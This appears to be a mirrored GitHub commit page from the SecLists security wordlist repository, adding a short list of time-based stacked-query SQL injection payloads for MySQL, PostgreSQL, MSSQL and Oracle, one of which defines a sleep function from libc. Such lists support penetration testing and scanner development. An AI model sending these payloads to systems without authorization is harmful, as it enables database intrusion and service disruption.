mirror of
https://github.com/danielmiessler/SecLists.git
synced 2026-08-11 19:57:23 +00:00
feat(wordlist): Added risk-classified list of SQLi payloads
Initial sorting created by the classifier script. Related to #1320 Closes #1011 Co-authored-by: 0xBassia <med.bassia@gmail.com> Co-authored-by: Miroslav Stampar <miroslav.stampar@gmail.com> Co-authored-by: soka <romain.dereydellet@gmail.com> Co-authored-by: Alexis Danizan <51817778+0x4144@users.noreply.github.com>
This commit is contained in:
@@ -0,0 +1,9 @@
|
||||
;SELECT SLEEP([SLEEPTIME])
|
||||
;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
|
||||
;SELECT PG_SLEEP([SLEEPTIME])
|
||||
;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])
|
||||
;WAITFOR DELAY '0:0:[SLEEPTIME]'
|
||||
;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x
|
||||
;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL
|
||||
;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END
|
||||
;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END
|
||||
Reference in New Issue
Block a user